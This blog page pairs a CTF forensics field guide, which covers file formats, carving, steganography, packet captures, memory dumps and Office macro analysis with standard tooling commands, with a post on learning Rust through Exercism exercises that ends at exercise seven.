19 Jun 2017, 21:49

CTF Forensics Field Guide

Note: this post was also submitted as a chapter to the CTF field guide.

Forensics

In a CTF context, “Forensics” challenges can include file format analysis, steganography, memory dump analysis, or network packet capture analysis. Any challenge to examine and process a hidden piece of information out of static data files (as opposed to executable programs or remote servers) could be considered a Forensics challenge (unless it involves cryptography, in which case it probably belongs in the Crypto category).

Forensics is a broad CTF category that does not map well to any particular job role in the security industry, although some challenges model the kinds of tasks seen in Incident Response (IR). Even in IR work, computer forensics is usually the domain of law enforcement seeking evidentiary data and attribution, rather than the commercial incident responder who may just be interested in expelling an attacker and/or restoring system integrity.

Unlike most CTF forensics challenges, a real-world computer forensics task would hardly ever involve unraveling a scheme of cleverly encoded bytes, hidden data, mastroshka-like files-within-files, or other such brain-teaser puzzles. One would typically not bust a criminal case by carefully reassembling a corrupted PNG file, revealing a photo of a QR code that decodes to a password for a zip archive containing an NES rom that when played will output the confession. Rather, real-world forensics typically requires that a practictioner find indirect evidence of maliciousness: either the traces of an attacker on a system, or the traces of “insider threat” behavior. Real-world computer forensics is largely about knowing where to find incriminating clues in logs, in memory, in filesystems/registries, and associated file and filesystem metadata. Also, network (packet capture) forensics is more about metadata analysis than content analysis, as most network sessions are TLS-encrypted between endpoints now.

This disconnect between the somewhat artificial puzzle-game CTF “Forensics” and the way that forensics is actually done in the field might be why this category does not receive as much attention as the vulnerability-exploitation style challenges. It may also lack the “black hat attacker” appeal that draws many players to participate in CTFs. Regardless, many players enjoy the variety and novelty in CTF forensics challenges. It can also be a more beginner friendly category, in which the playing field is evened out by the fact that there are no $5,000 professional tools like IDA Pro Ultimate Edition with Hex-Rays Decompiler that would give a huge advantage to some players but not others, as is the case with executable analysis challenges.

Requisite Skills

For solving forensics CTF challenges, the three most useful abilities are probably:

  • Knowing a scripting language (e.g., Python)
  • Knowing how to manipulate binary data (byte-level manipulations) in that language
  • Recognizing formats, protocols, structures, and encodings

The first and second you can learn and practice outside of a CTF, but the third may only come from experience. Hopefully with this document, you can at least get a good headstart.

And of course, like most CTF play, the ideal environment is a Linux system with – occasionally – Windows in a VM. MacOS is not a bad environment to substitute for Linux, if you can accept that some open-source tools may not install or compile correctly.

Manipulating Binary Data in Python

Assuming you have already picked up some Python programming, you still may not know how to effectively work with binary data. Low-level languages like C might be more naturally suited for this task, but Python’s many useful packages from the open-source community outweigh its learning curve for working with binary data.

Here are some examples of working with binary data in Python.

Writing or reading a file in binary mode:

f = open('Reverseit', "rb")
s = f.read()
f.close()
f = open('ItsReversed', "wb")
f.write(s[::-1])
f.close()

The bytearray type is a mutable sequence of bytes, and is available in both Python 2 and 3:

>>> s = bytearray(b"Hello World")
>>> for c in s: print(c)
...
72
101
108
108
111
32
87
111
114
108
100

You can also define a bytearray from hexidecimal representation Unicode strings:

>>> example2 = bytearray.fromhex(u'00 ff')
>>> example2
bytearray(b'\x00\xff')
>>> example2[1]
255

The bytearray type has most of the same convenient methods as a Python str or list: split(), insert(), reverse(), extend(), pop(), remove(), etc.

Reading a file into a bytearray for processing:

data = bytearray(open('challenge.png', 'rb').read())

Common Forensics Concepts and Tools

What follows is a high-level overview of some of the common concepts in forensics CTF challenges, and some recommended tools for performing common tasks.

File format identification (and “magic bytes”)

Almost every forensics challenge will involve a file, usually without any context that would give you a guess as to what the file is. Filetypes, as a concept for users, have historically been indicated either with filetype extensions (e.g., readme.md for MarkDown), MIME types (as on the web, with Content-Type headers), or with metadata stored in the filesystem (as with the mdls command in MacOS). In a CTF, part of the game is to identify the file ourselves, using a heuristic approach.

The traditional heuristic for identifying filetypes on UNIX is libmagic, which is a library for identifying so-called “magic numbers” or “magic bytes,” the unique identifying marker bytes in filetype headers. The libmagic libary is the basis for the file command.

$ file screenshot.png 
screenshot.png: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced

Keep in mind that heuristics, and tools that employ them, can be easily fooled. Because it is a CTF, you may be presented with a file that has been intentionally crafted to mislead file. Also, if a file contains another file embedded somewhere inside it, the file command is only going to identify the containing filetype. In scenarios such as these you may need to examine the file content more closely.

TrID is a more sophisticated version of file. Although it’s closed-source, it’s free and works across platforms. It also uses an identification heuristic, but with certainty percentages. Its advantage is its larger set of known filetypes that include a lot of proprietary and obscure formats seen in the real world.

File carving

Files-within-files is a common trope in forensics CTF challenges, and also in embedded systems’ firmware where primitive or flat filesystems are common. The term for identifying a file embedded in another file and extracting it is “file carving.” One of the best tools for this task is the firmware analysis tool binwalk.

scalpel, now a part of SleuthKit (discussed further under Filesystems) is another tool for file-carving, formerly known as Foremost.

To manually extract a sub-section of a file (from a known offset to a known offset), you can use the dd command. Many hex-editors also offer the ability to copy bytes and paste them as a new file, so you don’t need to study the offsets.

Example of file-carving with dd from an file-offset of 1335205 for a length of 40668937 bytes:

$ dd if=./file_with_a_file_in_it.xxx of=./extracted_file.xxx bs=1 skip=1335205 count=40668937

Although the above tools should suffice, in some cases you may need to programmatically extract a sub-section of a file using Python, using things like Python’s re or regex modules to identify magic bytes, and the zlib module to extract zlib streams.

Initial analysis

At first you may not have any leads, and need to explore the challenge file at a high-level for a clue toward what to look at next. Some of the useful commands to know are strings to search for all plain-text strings in the file, grep to search for particular strings, bgrep to search for non-text data patterns, and hexdump.

Example of using strings to find ASCII strings, with file offsets:

$ strings -o screenshot.png
     12 IHDR
     36 $iCCPICC Profile
     88 U2EI4HB
...
     767787 IEND

Unicode strings, if they are UTF-8, might show up in the search for ASCII strings. But to search for other encodings, see the documentation for the -e flag. Beware the many encoding pitfalls of strings: some caution against its use in forensics at all, but for simple tasks it still has its place.

Example of searching for the PNG magic bytes in a PNG file:

$ bgrep 89504e47 screenshot.png 
screenshot.png: 00000000

Example of using hexdump:

$ hexdump -C screenshot.png | less
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 05 ca 00 00 02 88  08 06 00 00 00 40 3d c9  |.............@=.|
00000020  a4 00 00 18 24 69 43 43  50 49 43 43 20 50 72 6f  |....$iCCPICC Pro|
00000030  66 69 6c 65 00 00 58 85  95 79 09 38 55 5d f8 ef  |file..X..y.8U]..|
00000040  da 67 9f c9 71 0c c7 41  e6 79 9e 87 0c 99 e7 39  |.g..q..A.y.....9|
:

The advantage of hexdump is not that it is the best hex-editor (it’s not), but that you can pipe output of other commands directly into hexdump, and/or pipe its output to grep, or format its output using format strings.

Example of using hexdump format strings to output the first 50 bytes of a file as a series of 64-bit integers in hex:

$ hexdump -n 50 -e '"0x%08x "' screenshot.png
0x474e5089 0x0a1a0a0d 0x0d000000 0x52444849 0xca050000 0x88020000 0x00000608 0xc93d4000 0x180000a4 0x43436924 0x43434950 0x6f725020 0x00006966

Other uses of the hexdump command.

Binary-as-text encodings

Binary is 1’s and 0’s, but often is transmitted as text. It would be wasteful to transmit actual sequences of 101010101, so the data is first encoded using one of a variety of methods. This is what is referred to as binary-to-text encoding, a popular trope in CTF challenges. When doing a strings analysis of a file as discussed above, you may uncover this binary data encoded as text strings.

We mentioned that to excel at forensics CTF challenges, it is important to be able to recognize encodings. Some can be identifed at a glance, such as Base64 encoded content, identifiable by its alphanumeric charset and its “=” padding suffix (when present). There are many Base64 encoder/decoders online, or you can use the base64 command:

$ echo aGVsbG8gd29ybGQh | base64 -D
hello world!

ASCII-encoded hexadecimal is also identifiable by its charset (0-9, A-F). ASCII characters themselves occupy a certain range of bytes (0x00 through 0x7f, see man ascii), so if you are examining a file and find a string like 68 65 6c 6c 6f 20 77 6f 72 6c 64 21, it’s important to notice the preponderance of 0x60’s here: this is ASCII. Technically, it’s text (“hello world!”) encoded as ASCII (binary) encoded as hexadecimal (text again). Confused yet? 😉

There are several sites that provide online encoder-decoders for a variety of encodings. For a more local converter, try the xxd command.

Example of using xxd to do text-as-ascii-to-hex encoding:

$ echo hello world\! | xxd -p
68656c6c6f20776f726c64210a

Common File formats

We’ve discussed the fundamental concepts and the tools for the more generic forensics tasks. Now, we’ll discuss more specific categories of forensics challenges, and the recommended tools for analyzing challenges in each category.

It would be impossible to prepare for every possible data format, but there are some that are especially popular in CTFs. If you were prepared with tools for analyzing the following, you would be prepared for the majority of Forensics challenges:

  • Archive files (ZIP, TGZ)
  • Image file formats (JPG, GIF, BMP, PNG)
  • Filesystem images (especially EXT4)
  • Packet captures (PCAP, PCAPNG)
  • Memory dumps
  • PDF
  • Video (especially MP4) or Audio (especially WAV, MP3)
  • Microsoft’s Office formats (RTF, OLE, OOXML)

Some of the harder CTF challenges pride themselves on requiring players to analyze an especially obscure format for which no publicly available tools exist. You will need to learn to quickly locate documentation and tools for unfamiliar formats. Many file formats are well-described in the public documentation you can find with a web search, but having some familiarity with the file format specifications will also help, so we include links to those here.

When analyzing file formats, a file-format-aware (a.k.a. templated) hex-editor like 010 Editor is invaluable. An open-source alternative has emerged called Kaitai. Additionally, a lesser-known feature of the Wireshark network protocol analyzer is its ability to analyze certain media file formats like GIF, JPG, and PNG. All of these tools, however, are made to analyze non-corrupted and well-formatted files. Many CTF challenges task you with reconstructing a file based on missing or zeroed-out format fields, etc.

You also ought to check out the wonderful file-formats illustrated visually by Ange Albertini.

Archive files

Most CTF challenges are contained in a zip, 7z, rar, tar or tgz file, but only in a forensics challenge will the archive container file be a part of the challenge itself. Usually the goal here is to extract a file from a damaged archive, or find data embedded somewhere in an unused field (a common forensics challenge). Zip is the most common in the real world, and the most common in CTFs.

There are a handful of command-line tools for zip files that will be useful to know about.

  • unzip will often output helpful information on why a zip will not decompress.
  • zipdetails -v will provide in-depth information on the values present in the various fields of the format.
  • zipinfo lists information about the zip file’s contents, without extracting it.
  • zip -F input.zip --out output.zip and zip -FF input.zip --out output.zip attempt to repair a corrupted zip file.
  • fcrackzip brute-force guesses a zip password (for passwords <7 characters or so).

Zip file format specification

One important security-related note about password-protected zip files is that they do not encrypt the filenames and original file sizes of the compressed files they contain, unlike password-protected RAR or 7z files.

Another note about zip cracking is that if you have an unencrypted/uncompressed copy of any one of the files that is compressed in the encrypted zip, you can perform a “plaintext attack” and crack the zip, as detailed here, and explained in this paper. The newer scheme for password-protecting zip files (with AES-256, rather than “ZipCrypto”) does not have this weakness.

Image file format analysis

CTFs are supposed to be fun, and image files are good for containing hacker memes, so of course image files often appear in CTF challenges. Image file formats are complex and can be abused in many ways that make for interesting analysis puzzles involving metadata fields, lossy and lossless compression, checksums, steganography, or visual data encoding schemes.

The easy initial analysis step is to check an image file’s metadata fields with exiftool. If an image file has been abused for a CTF, its EXIF might identify the original image dimensions, camera type, embedded thumbnail image, comments and copyright strings, GPS location coordinates, etc. There might be a gold mine of metadata, or there might be almost nothing. It’s worth a look.

Example of exiftool output, truncated:

$ exiftool screenshot.png 
ExifTool Version Number         : 10.53
File Name                       : screenshot.png
Directory                       : .
File Size                       : 750 kB
File Modification Date/Time     : 2017:06:13 22:34:05-04:00
File Access Date/Time           : 2017:06:17 13:19:58-04:00
File Inode Change Date/Time     : 2017:06:13 22:34:05-04:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1482
Image Height                    : 648
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
...
Primary Platform                : Apple Computer Inc.
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : APPL
Device Model                    : 
...
Exif Image Width                : 1482
Exif Image Height               : 648
Image Size                      : 1482x648
Megapixels                      : 0.960

PNG files, in particular, are popular in CTF challenges, probably for their lossless compression suitable for hiding non-visual data in the image. PNG files can be dissected in Wireshark. To verify correcteness or attempt to repair corrupted PNGs you can use pngcheck. If you need to dig into PNG a little deeper, the pngtools package might be useful.

Steganography, the practice of concealing some amount of secret data within an unrelated data as its vessel (a.k.a. the “cover text”), is extraordinarily rare in the real world (made effectively obsolete by strong cryptography), but is another popular trope in CTF forensics challenges. Steganography could be implemented using any kind of data as the “cover text,” but media file formats are ideal because they tolerate a certain amount of unnoticeable data loss (the same characteristic that makes lossy compression schemes possible). The difficulty with steganography is that extracting the hidden message requires not only a detection that steganography has been used, but also the exact steganographic tool used to embed it. Given a challenge file, if we suspect steganography, we must do at least a little guessing to check if it’s present. Stegsolve (JAR download link) is often used to apply various steganography techniques to image files in an attempt to detect and extract hidden data. You may also try zsteg.

Gimp provides the ability to alter various aspects of the visual data of an image file. CTF challenge authors have historically used altered Hue/Saturation/Luminance values or color channels to hide a secret message. Gimp is also good for confirming whether something really is an image file: for instance, when you believe you have recovered image data from a display buffer in a memory dump or elsewhere, but you lack the image file header that specifies pixel format, image height and width and so on. Open your mystery data as “raw image data” in Gimp and experiment with different settings.

The ImageMagick toolset can be incorporated into scripts and enable you to quickly identify, resize, crop, modify, convert, and otherwise manipulate image files. It can also find the visual and data difference between two seemingly identical images with its compare tool.

If you are writing a custom image file format parser, import the Python Image Library (PIL) aka Pillow. It enables you to extract frames from animated GIFs or even individual pixels from a JPG – it has native support for most major image file formats.

If working with QR codes (2D barcodes), also check out the qrtools module for Python. You can decode an image of a QR code with less than 5 lines of Python. Of course, if you just need to decode one QR code, any smartphone will do.

Filesystems analysis

Occasionally, a CTF forensics challenge consists of a full disk image, and the player needs to have a strategy for finding a needle (the flag) in this haystack of data. Triage, in computer forensics, refers to the ability to quickly narrow down what to look at. Without a strategy, the only option is looking at everything, which is time-prohibitive (not to mention exhausting).

Example of mounting a CD-ROM filesystem image:

mkdir /mnt/challenge
mount -t iso9660 challengefile /mnt/challenge

Once you have mounted the filesystem, the tree command is not bad for a quick look at the directory structure to see if anything sticks out to you for further analysis.

You may not be looking for a file in the visible filesystem at all, but rather a hidden volume, unallocated space (disk space that is not a part of any partition), a deleted file, or a non-file filesystem structure like an http://www.nirsoft.net/utils/alternate_data_streams.html. For EXT3 and EXT4 filesystems, you can attempt to find deleted files with extundelete. For everything else, there’s TestDisk: recover missing partition tables, fix corrupted ones, undelete files on FAT or NTFS, etc.

The Sleuth Kit and its accompanying web-based user interface, “Autopsy,” is a powerful open-source toolkit for filesystem analysis. It’s a bit geared toward law-enforcement tasks, but can be helpful for tasks like searching for a keyword across the entire disk image, or looking at the unallocated space.

Embedded device filesystems are a unique category of their own. Made for fixed-function low-resource environments, they can be compressed, single-file, or read-only. Squashfs is one popular implementation of an embedded device filesystem. For images of embedded devices, you’re better off analyzing them with firmware-mod-kit or binwalk.

Packet Capture (PCAP) file analysis

Network traffic is stored and captured in a PCAP file (Packet capture), with a program like tcpdump or Wireshark (both based on libpcap). A popular CTF challenge is to provide a PCAP file representing some network traffic and challenge the player to recover/reconstitute a transferred file or transmitted secret. Complicating matters, the packets of interest are usually in an ocean of unrelated traffic, so analysis triage and filtering the data is also a job for the player.

For initial analysis, take a high-level view of the packets with Wireshark’s statistics or conversations view, or its capinfos command. Wireshark, and its command-line version tshark, both support the concept of using “filters,” which, if you master the syntax, can quickly reduce the scope of your analysis. There is also an online service called PacketTotal where you can submit PCAP files up to 50MB, and graphically display some timelines of connections, and SSL metadata on the secure connections. Plus it will highlight file transfers and show you any “suspicious” activity. If you already know what you’re searching for, you can do grep-style searching through packets using ngrep.

Just as “file carving” refers to the identification and extraction of files embedded within files, “packet carving” is a term sometimes used to describe the extraction of files from a packet capture. There are expensive commercial tools for recovering files from captured packets, but one open-source alternative is the Xplico framework. Wireshark also has an “Export Objects” feature to extract data from the capture (e.g., File -> Export Objects -> HTTP -> Save all). Beyond that, you can try tcpxtract, Network Miner, Foremost, or Snort.

If you want to write your own scripts to process PCAP files directly, the dpkt Python package for pcap manipulation is recommended. You could also interface Wireshark from your Python using Wirepy.

If trying to repair a damaged PCAP file, there is an online service for repairing PCAP files called PCAPfix.

A note about PCAP vs PCAPNG: there are two versions of the PCAP file format; PCAPNG is newer and not supported by all tools. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.

Memory dump analysis

For years, computer forensics was synonymous with filesystem forensics, but as attackers became more sophisticated, they started to avoid the disk. Also, a snapshot of memory often contains context and clues that are impossible to find on disk because they only exist at runtime (operational configurations, remote-exploit shellcode, passwords and encryption keys, etc). So memory snapshot / memory dump forensics has become a popular practice in incident response. In a CTF, you might find a challenge that provides a memory dump image, and tasks you with locating and extracting a secret or a file from within it.

The premiere open-source framework for memory dump analysis is Volatility. Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant “profile” (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifact.

Ethscan is made to find data in a memory dump that looks like network packets, and then extract it into a pcap file for viewing in Wireshark. There are plugins for extracting SQL databases, Chrome history, Firefox history and much more.

PDF file analysis

PDF is an extremely complicated document file format, with enough tricks and hiding places to write about for years. This also makes it popular for CTF forensics challenges. The NSA wrote a guide to these hiding places in 2008 titled “Hidden Data and Metadata in Adobe PDF Files: Publication Risks and Countermeasures.” It’s no longer available at its original URL, but you can find a copy here. Ange Albertini also keeps a wiki on GitHub of PDF file format tricks.

The PDF format is partially plain-text, like HTML, but with many binary “objects” in the contents. Didier Stevens has written good introductory material about the format. The binary objects can be compressed or even encrypted data, and include content in scripting languages like JavaScript or Flash. To display the structure of a PDF, you can either browse it with a text editor, or open it with a PDF-aware file-format editor like Origami.

qpdf is one tool that can be useful for exploring a PDF and transforming or extracting information from it. Another is a framework in Ruby called Origami.

When exploring PDF content for hidden data, some of the hiding places to check include:

  • non-visible layers
  • Adobe’s metadata format “XMP”
  • the “incremental generation” feature of PDF wherein a previous version is retained but not visible to the user
  • white text on a white background
  • text behind images
  • an image behind an overlapping image
  • non-displayed comments

There are also several Python packages for working with the PDF file format, like PeepDF, that enable you to write your own parsing scripts.

Video and Audio file analysis

Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges not because hacking or data hiding ever happens this way in the real world, but just because audio and video is fun. As with image file formats, stegonagraphy might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the mediainfo tool (or exiftool) and identify the content type and look at its metadata.

Audacity is the premiere open-source audio file and waveform-viewing tool, and CTF challenge authors love to encode text into audio waveforms, which you can see using the spectogram view (although a specialized tool called Sonic Visualiser is better for this task in particular). Audacity can also enable you to slow down, reverse, and do other manipulations that might reveal a hidden message if you suspect there is one (if you can hear garbled audio, interference, or static). Sox is another useful command-line tool for converting and manipulating audio files.

It’s also common to check least-significant-bits (LSB) for a secret message. Most audio and video media formats use discrete (fixed-size) “chunks” so that they can be streamed; the LSBs of those chunks are a common place to smuggle some data without visibly affecting the file.

Other times, a message might be encoded into the audio as DTMF tones or morse code. For these, try working with multimon-ng to decode them.

Video file formats are really container formats, that contain separate streams of both audio and video that are multiplexed together for playback. For analyzing and manipulating video file formats, ffmpeg is recommended. ffmpeg -i gives initial analysis of the file content. It can also de-multiplex or playback the content streams. The power of ffmpeg is exposed to Python using ffmpy.

Office file analysis

Microsoft has created dozens of office document file formats, many of which are popular for the distribution of phishing attacks and malware because of their ability to include macros (VBA scripts). Microsoft Office document forensic analysis is not too different from PDF document forensics, and just as relevant to real-world incident response.

Broadly speaking, there are two generations of Office file format: the OLE formats (file extensions like RTF, DOC, XLS, PPT), and the “Office Open XML” formats (file extensions that include DOCX, XLSX, PPTX). Both formats are structured, compound file binary formats that enable Linked or Embedded content (Objects). OOXML files are actually zip file containers (see the section above on archive files), meaning that one of the easiest ways to check for hidden data is to simply unzip the document:

$ unzip example.docx 
Archive:  example.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
 extracting: docProps/thumbnail.jpeg  
  inflating: word/comments.xml       
  inflating: word/settings.xml       
  inflating: word/fontTable.xml      
  inflating: word/styles.xml         
  inflating: word/stylesWithEffects.xml  
  inflating: docProps/app.xml        
  inflating: docProps/core.xml       
  inflating: word/webSettings.xml    
  inflating: word/numbering.xml
$ tree
.
├── [Content_Types].xml
├── _rels
├── docProps
│   ├── app.xml
│   ├── core.xml
│   └── thumbnail.jpeg
└── word
    ├── _rels
    │   └── document.xml.rels
    ├── comments.xml
    ├── document.xml
    ├── fontTable.xml
    ├── numbering.xml
    ├── settings.xml
    ├── styles.xml
    ├── stylesWithEffects.xml
    ├── theme
    │   └── theme1.xml
    └── webSettings.xml

As you can see, some of the structure is created by the file and folder hierarchy. The rest is specified inside the XML files. New Steganographic Techniques for the OOXML File Format, 2011 details some ideas for data hiding techniques, but CTF challenge authors will always be coming up with new ones.

Once again, a Python toolset exists for the examination and analysis of OLE and OOXML documents: oletools. For OOXML documents in particular, OfficeDissector is a very powerful analysis framework (and Python library). The latter includes a quick guide to its usage.

Sometimes the challenge is not to find hidden static data, but to analyze a VBA macro to determine its behavior. This is a more realistic scenario, and one that analysts in the field perform every day. The aforementioned dissector tools can indicate whether a macro is present, and probably extract it for you. A typical VBA macro in an Office document, on Windows, will download a PowerShell script to %TEMP% and attempt to execute it, in which case you now have a PowerShell script analysis task too. But malicious VBA macros are rarely complicated, since VBA is typically just used as a jumping-off platform to bootstrap code execution. In the case where you do need to understand a complicated VBA macro, or if the macro is obfuscated and has an unpacker routine, you don’t need to own a license to Microsoft Office to debug this. You can use Libre Office: its interface will be familiar to anyone who has debugged a program; you can set breakpoints and create watch variables and capture values after they have been unpacked but before whatever payload behavior has executed. You can even start a macro of a specific document from a command line:

$ soffice path/to/test.docx macro://./standard.module1.mymacro

20 Mar 2017, 22:56

A tour of Rust, Pt. 2

In my last post, I talked about what I think is the significance of the programming language Rust, and why I wanted to try learning it. Today, I take a look at Exercism.io (a sort-of social network for programming exercises) and its series of Rust challenges. These are definitely easy problems (so far); the focus is on learning how to solve them in a language that is new to you. We’ll see where I tripped up while trying to grasp some of the Rust language features, and some Rust I’ve learned so far.

Exercism.io Setup and Workflow

Assuming you also use MacOS with Homebrew, it’s just a couple of steps:

$ brew update && brew install exercism
$ exercism configure --key=YOUR_API_KEY
$ exercism configure --dir=~/Documents/Exercism

And then each new programming exercise is fetched this way:

$ exercism fetch rust		# will download the next exercise, "whatever"
$ cd ~/Documents/Exercism/whatever
$ mkdir src && touch src/lib.rs   # then, work on your solution in lib.rs

Each exercise asks you to write a Rust library that exports a function or two, such that you implement some behavior instructed in the README.md for that exercise. The folder structure provided is that of a Rust “crate”, which is what Rust (or rather, its build tool, Cargo) calls a source package. You will define a pub fn whatev() in src/lib.rs, which is the filename convention for a Rust library crate (as opposed to an executable crate, which would have a fn main() defined in a src/main.rs). Cargo.toml is the manifest file that defines the crate: the version string, the dependencies, author.

Each challenge comes with unit tests in tests/whatever.rs (technically, integration tests. Rust allows you to write the unit tests inline with the source files themselves). You can run the tests using Rust’s build tool, Cargo:

$ cargo test	# both compiles your library and runs the tests

If you just wanted to compile, you could run cargo build. Were this an executable crate rather than a library crate, you could also cargo run, but with a library crate run has no meaning, so we cargo test. Note: if you had noticed that the binaries are rather large, that is because Cargo builds debug binaries by default. For release, you would use cargo build —release.

Once all of the unit tests pass for an exercise, you can submit your solution like so:

$ exercism submit src/lib.rs

Rust Debugging in the VS Code editor

Although I discussed setting up a Rust development environment in the last post, Andrew Hobden has also documented the setup and use of other tools in the Rust development toolchain, and his writeup may be worth a look. For me right now, I don’t want the added headache of trying to work with any alpha or “nightly build” features of Rust. What was important for me was debugging in VS Code, so I appreciated his help with that. While I previously had no luck getting the “Native Debug” VS Code extension to work, using Andrew’s instructions, I did get the “LLDB Debugger” extension to work.

But do you need to manually recreate .vscode/launch.json and .vscode/tasks.json for every project you want to debug? That blows – Well sort of. In VS Code you can click the debug icon in the sidebar and then the settings wheel icon in the debug pane that appears, and VS Code will create a mostly-complete launch.json file to which you just have to add:

"preLaunchTask": "cargo",
"sourceLanguages": ["rust"]

And of course, you’ll have to fix the final part of the path for “program” (your debug target). So there isn’t that much to do manually for each new project. But when you tell VS Code to run a “preLaunchTask”, as above, you then have to define that “task” in a .vscode/tasks.json file, but it’s the same every time, just copy and paste it from your last project. A hassle compared to debugging with a real IDE, but a minor hassle at least.

Exercism Exercises 1-10

1: Hello World, and strings in Rust

It looks like the developers of this challenge changed their answer format somewhere along the way during development, and now it actually contains conflicting instructions. Fortunately, this is the only challenge with this problem, but ignore the README.md this time as well as the GETTING_STARTED.md. As with most of these challenges, the most important file is tests/hello-world.rs which defines the Cargo unit tests and gives the guiding examples of what your code is supposed to produce. In this case, it is very simple, you just need to produce the string “Hello, World!” using a function called fn hello.

But what is the correct function declaration for fn hello? First, it has to be a function that is published by your Rust library for external callers, thus it is pub fn hello.

It is not taking any arguments (despite what the muddled insructions state), so it is pub fn hello().

And it returns a string, so it is…uh-oh. Here, Rust makes this harder than you might expect. There is the primitive type for representing strings, str, and then there is a String type (from the Rust standard library). They seem similar and completely redundant at first, but their purposes and usages are different in a variety of ways that will trip you up if you don’t understand what each one means. This duality of Strings and string literals is essential to understand, and it is poorly explained (if explained at all) in every Rust tutorial I’ve seen. If people need to write long posts explaining the difference, I think the language documentation could be doing a better job here.

Complicating matters, str is used synonymously in Rust documentation with “string” and “string literal”, and a reference to a subset of a String is an &str, a.k.a. “string slice”. In fact, a function that takes a &str can be passed a &String (a concept in Rust called coercion, i.e. implicit type conversion), but a function that takes a &String cannot be passed a &str. Wow. Confused yet? Just wait until you try to concatenate two strings. We’ll get to that later.

If you choose to use String, the return type is simple to understand, but you have to build a String instance out of a string literal using .to_string() or String::from, which is non-obvious:

pub fn hello() -> String {
  "Hello, World!".to_string()  // alternatively, String::from("Hello, World!")
}

If you choose instead to use str, the actual returned value needs nothing special, but the return type is by borrowed reference (hence the ampersand) and requires a lifetime specifier, something unique to Rust:

pub fn hello() -> &'static str {
    "Hello, World!"
}

This is to say, hello() returns a reference to an immutable string literal. In other words, a pointer to the string “Hello, World!” and the caller of hello() cannot change that string using a dereference of this pointer. The reference is valid for static, a lifetime duration defined as the “duration of the entire program.” This is basically a guarantee to the caller that this reference will always be valid. String literals will always get a static lifetime because they’re hard-coded in the compiled Rust binary’s data section; they are never deallocated.

So, with a simple HelloWorld example we’ve had to introduce ourselves to the three big concepts unique to Rust: ownership, reference borrowing, and lifetimes. We’ve also tripped over the str/String duality and the concept of coercion. As we struggle to comprehend these concepts, they’ll be responsible for the majority of our compile-time errors. This is the Rust learning curve.

2: Gigasecond, and including external crates

Hint, for this one, you’ll be needing the Chrono crate, because the Rust standard library currently has no library for handling the concept of time. Your lib.rs file begins with:

extern crate chrono;
use chrono::*;

And your Cargo.toml file declares this dependency as well:

[dependencies]
chrono = "0.2"

When you cargo test, Cargo will automatically fetch and install the crate “Chrono” for you. Nice! Now you can add seconds to times and compare times to one another.

The instructions for this challenge may mislead you to try to use the caret as an exponentiation operator:

A gigasecond is 10^9 (1,000,000,000) seconds.

Yes, but Rust (like C before it) lacks an exponentiation operator. Not only does 10^9 not define the value 1_000_000_000, it also doesn’t generate a compile-time error. Instead, it is interpreted as the bitwise XOR of 10 and 9: in other words, 10^9 equals 3 (surprise, LOL). Again, the official Rust documentation (“The Rust Programming Language”) is a bit lacking with its complete absence of explanation of the operators that Rust actually has and does not have, a fundamental part of any language. Instead, you should consult the “Rust Language Reference” for this information. That said, if you really want to do exponentiation, several of the primitive types have exponentiation methods: the floating point types f32 and f64 which offer the powi(i32) method, and the integer types i32 and i64 which offer pow(u32).

let ten = 10_i64;
ten.pow(9)  // this is 1,000,000,000

3: Leap, and the modulus operator

There is little to learn from this exercise except the proper use of the % operator, which, again, was up to you to find in the Language Reference. It’s an “either you know this trick or you don’t” challenge, but popular in whiteboard programming questions in job interviews, and occasionally useful in real life. Example snippet:

// On every year that is evenly divisible by 4:
    if candidate_year % 4 == 0 {
        // Except every year that is evenly divisible by 100:
        if candidate_year % 100 == 0 {

4: Raindrops, and the modulus operator again

This is a simple integer-to-string (hint: some_value.to_string()) and integer-factoring challenge. Again, the modulo operator is all you need, and this exercise fails to add any new lesson really.

5: Bob, and iterators

Given some &str prompt you can iterate over every character in the string in a for loop, without having to use pointers or indices as a C programmer is tempted to do:

for character in prompt.chars() {
	// do stuff to each character
}

And in fact, it is basically impossible to loop across a str in any other way, because you cannot use array indexing on a str as you might with a string in C, and create a for loop that ranges from prompt[0] to prompt[prompt.len()]. Even for Rust types where that pattern is possible, it is discouraged: find your loop ranges using iterators, which are returned by methods like .chars() or .iter(). The code above automatically turns character into a value of type char because prompt.chars is a range of char values.

Rust’s char type has some handy methods, for example: if character.is_alphabetic() and if character.is_uppercase().

6: Beer Song, string concatenation, and the match statement

String concatenation in Rust is completely bonkers:

let a = "foo";
let b = "bar";

println!("{}", a + b);                          // invalid
let c = a + &b;                                 // invalid
let c: String = a + b.to_string();              // invalid
let c: String = a.to_string() + b.to_string(); 	// invalid

let c: String = a.to_string() + b;              // valid!
let c: String = a.to_string() + &b.to_string(); // valid!
c.push_str(" more stuff on the end");           // valid!

The strings a and b here are str instances. The str type lacks any kind of concatenation operator, so you can’t use a + to concatenate them when the left operand is a str. However when the left operand is a String you totally can use the + because String does have the concatenation operator.

The String type is growable, whereas str is an annoyingly restricted type of data that mucks up everything it touches. You can’t build a str out of other str; you can’t even build a String out of two str without bending yourself into a pretzel. You may seek to avoid str altogether, but you can’t. Because every Rust string literal is a str, we are forced to work with both str and String, upconverting the former to the latter with .to_string(), and/or connecting them onto the end of a String with its .push_str() method.

But at least you can use the match keyword to help with this challenge:

// Form the appropriate English words to refer to the bottle or bottles:
fn bottles(quantity: u32) -> String {
    match quantity {
        0 => "No more bottles".to_string(),
        1 => "1 bottle".to_string(),
        _ => quantity.to_string() + " bottles",
    }
}

That’s a lot cleaner than an if—else-if—else would have been.

7: Difference of Squares

